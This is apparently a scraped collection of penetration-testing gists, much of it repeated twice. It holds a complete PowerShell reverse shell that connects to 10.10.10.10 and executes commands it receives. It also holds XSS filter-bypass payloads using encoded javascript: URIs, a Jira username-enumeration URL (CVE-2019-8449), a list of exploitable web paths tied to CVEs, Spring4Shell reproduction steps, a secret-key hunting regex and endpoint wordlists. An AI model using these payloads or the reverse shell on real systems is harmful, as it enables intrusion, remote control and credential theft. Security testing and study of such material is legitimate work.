Sachin Artani Sachinart

## powershell_reverse_shell.ps1
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html

$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

## OBWS_2.md

      
              1 file
            
          
              7 forks
            
          
              0 comments
            
          
              18 stars
            
          
                seresistvanandras
                / OBWS_2.md
            
            
              Last active
              June 3, 2024 06:08
            
              
                Hacking smart contracts for fun and profit
              
          
    Hacking smart contracts for fun and profit

Description of the game
The goal of the game to break as many contracts as possible! Note: one of these contracts is a HONEYPOT! BE CAREFUL!!
Claim your Ropsten test ether here!
The contracts you need to break and their addresses:

  
## href_bypass.html
<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()

<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)

## Jira bug-exploit


cve-2019-8449
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
 https://jira.atlassian.com/browse/JRASERVER-69796
 https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
=====================================================================================================================================

## exploitable_webpaths.md

      
              1 file
            
          
              3 forks
            
          
              0 comments
            
          
              5 stars
            
          
                kafkaesqu3
                / exploitable_webpaths.md
            
            
              Last active
              May 7, 2024 09:38
            
              
                easy wins - exploitable/leaky web paths
              
          
Exploit/description
Path


Microsoft Office Online Server SSRF (relay)
/op/view.aspx


CVE-2017-11317 CVE-2019-18935
/Telerik.Web.Ui.WebResource.axd?type=rau


CVE-2017-11317 CVE-2019-18935
/Telerik.Web.UI.DialogHandler.aspx


CVE-2020-17519
/jobmanager/logs/


CVE-2017-7615
/verify.php?id=1&confirm_hash=


CVE-2018-1000130
/jolokia


CVE-2018-1000130
/actuator/jolokia


leak
/actuator/env


## stuff.txt

At this point, it is probably easier to just use something like this: https://github.com/reznok/Spring4Shell-POC


- clone https://spring.io/guides/gs/handling-form-submission/
- you can skip right to gs-handling-form-submission/complete, no need to follow the tutorial
- modify it so that you can build a war file (https://www.baeldung.com/spring-boot-war-tomcat-deploy)
- install tomcat9 + java 11 (i did it on ubuntu 20.04)
- deploy the war file
- update the PoC (https://share.vx-underground.org/) to write the tomcatwar.jsp file to webapps/handling-form-submission instead of webapps/ROOT

## Generic keys
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k

## alloauth.txt
/plaid/mobile/oauth_callback
/callback
/oauth2/idpresponse
/signin-google
/twitter_oauth_signin
/soundcloud_oauth_signin
/23andme_oauth_signin
/500px_oauth_signin
/agave_oauth_signin
/amazon_oauth_signin

## zendesk_endpoints.txt
POST /api/v2/accounts
GET /api/v2/activities?since=cstest
GET /api/v2/audit_logs?filter[source_type]=cstest&filter[source_id]=1&filter[actor_id]=1&filter[ip_address]=cstest&filter[created_at]=cstest&filter[action]=cstest&sort_by=cstest&sort_order=cstest&sort=cstest
GET /api/v2/automations
POST /api/v2/automations
GET /api/v2/bookmarks
POST /api/v2/bookmarks
GET /api/v2/brands
POST /api/v2/brands
GET /api/v2/custom_objects
	# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html

	$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535\|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" \| Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
	<!--javascript -->
	ja&Tab;vascript:alert(1)
	ja&NewLine;vascript:alert(1)
	ja vascript:alert(1)
	javascript:alert()

	<!--::colon:: -->
	javascript&colon;alert()
	javascript:alert()
	javascript:alert(1)





	cve-2019-8449
	The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
	https://jira.atlassian.com/browse/JRASERVER-69796
	https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
	=====================================================================================================================================
Exploit/description	Path
Microsoft Office Online Server SSRF (relay)	/op/view.aspx
CVE-2017-11317 CVE-2019-18935	/Telerik.Web.Ui.WebResource.axd?type=rau
CVE-2017-11317 CVE-2019-18935	/Telerik.Web.UI.DialogHandler.aspx
CVE-2020-17519	/jobmanager/logs/
CVE-2017-7615	/verify.php?id=1&confirm_hash=
CVE-2018-1000130	/jolokia
CVE-2018-1000130	/actuator/jolokia
leak	/actuator/env

	At this point, it is probably easier to just use something like this: https://github.com/reznok/Spring4Shell-POC


	- clone https://spring.io/guides/gs/handling-form-submission/
	- you can skip right to gs-handling-form-submission/complete, no need to follow the tutorial
	- modify it so that you can build a war file (https://www.baeldung.com/spring-boot-war-tomcat-deploy)
	- install tomcat9 + java 11 (i did it on ubuntu 20.04)
	- deploy the war file
	- update the PoC (https://share.vx-underground.org/) to write the tomcatwar.jsp file to webapps/handling-form-submission instead of webapps/ROOT
	/plaid/mobile/oauth_callback
	/callback
	/oauth2/idpresponse
	/signin-google
	/twitter_oauth_signin
	/soundcloud_oauth_signin
	/23andme_oauth_signin
	/500px_oauth_signin
	/agave_oauth_signin
	/amazon_oauth_signin
	POST /api/v2/accounts
	GET /api/v2/activities?since=cstest
	GET /api/v2/audit_logs?filter[source_type]=cstest&filter[source_id]=1&filter[actor_id]=1&filter[ip_address]=cstest&filter[created_at]=cstest&filter[action]=cstest&sort_by=cstest&sort_order=cstest&sort=cstest
	GET /api/v2/automations
	POST /api/v2/automations
	GET /api/v2/bookmarks
	POST /api/v2/bookmarks
	GET /api/v2/brands
	POST /api/v2/brands
	GET /api/v2/custom_objects